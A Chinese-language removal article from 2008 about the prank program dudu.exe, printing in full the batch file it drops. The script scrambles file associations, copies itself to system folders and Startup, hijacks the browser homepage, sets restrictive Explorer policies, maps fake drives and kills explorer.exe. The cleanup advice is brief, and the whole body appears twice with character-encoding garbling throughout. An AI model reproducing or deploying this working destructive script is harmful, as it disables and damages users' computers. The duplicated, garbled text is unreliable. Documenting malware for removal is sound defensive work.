惡作劇程序dudu.exe清除方法
更新時間:2008年01月16日 20:02:29 作者:
惡作劇程序dudu.exe清除方法
惡作劇程序dudu.exe清除解決方案
dudu.exe運行后,當(dāng)前用戶臨時文件夾中釋放一個bt0577.bat批處理文件。這是個惡作劇程序。想辦法阻止此.bat運行,用記事本打開該文件,可以看到下列內(nèi)容:
@echo off
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .3g2=txtfile
assoc .dat=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
copy %0 "%windir%\system32\"
copy %0 "%systemdrive%"
copy %0 "%userprofile%\「開始」菜單\程序\啟動\*.*"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start
Page" /t reg_sz /dhttp://www.xiaowo.net/f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v
"Default_Page_URL" /t reg_sz /dhttp://www.xiaowo.net/f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFind /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoClose /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
HideClock /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
StartMenuLogOff /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
nodrives /t REG_DWORD /d 60 /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
taskkill /im explorer.exe /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewContextMenu /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoWinKeys /t REG_DWORD /d 1 /f
——————————————————————
如果bt0577.bat運行了,資源管理器進程被結(jié)束,用戶只有一個空桌面可看了;文件關(guān)聯(lián)被改得亂七八糟;三鍵調(diào)出任務(wù)管理器,重新啟動資源管理器,用資源管理器查看,可見硬盤分區(qū)增加n個其實并未增加(可用PQ核實)。
此程序不能穿透影子。如果在影子中運行從惡作劇程序,重啟一下就OK了。
dudu.exe運行后,當(dāng)前用戶臨時文件夾中釋放一個bt0577.bat批處理文件。這是個惡作劇程序。想辦法阻止此.bat運行,用記事本打開該文件,可以看到下列內(nèi)容:
@echo off
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .3g2=txtfile
assoc .dat=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
copy %0 "%windir%\system32\"
copy %0 "%systemdrive%"
copy %0 "%userprofile%\「開始」菜單\程序\啟動\*.*"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start
Page" /t reg_sz /dhttp://www.xiaowo.net/f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v
"Default_Page_URL" /t reg_sz /dhttp://www.xiaowo.net/f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFind /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoClose /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
HideClock /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
StartMenuLogOff /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
nodrives /t REG_DWORD /d 60 /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
taskkill /im explorer.exe /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewContextMenu /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoWinKeys /t REG_DWORD /d 1 /f
——————————————————————
如果bt0577.bat運行了,資源管理器進程被結(jié)束,用戶只有一個空桌面可看了;文件關(guān)聯(lián)被改得亂七八糟;三鍵調(diào)出任務(wù)管理器,重新啟動資源管理器,用資源管理器查看,可見硬盤分區(qū)增加n個其實并未增加(可用PQ核實)。
此程序不能穿透影子。如果在影子中運行從惡作劇程序,重啟一下就OK了。
相關(guān)文章
關(guān)于最近出現(xiàn)logo1_.exe基本介紹和清除技巧
關(guān)于最近出現(xiàn)logo1_.exe基本介紹和清除技巧...2007-03-03使用仙劍奇?zhèn)b傳四算號器不小心中了廣告插件的解決辦法
使用仙劍奇?zhèn)b傳四算號器不小心中了廣告插件的解決辦法...2007-08-08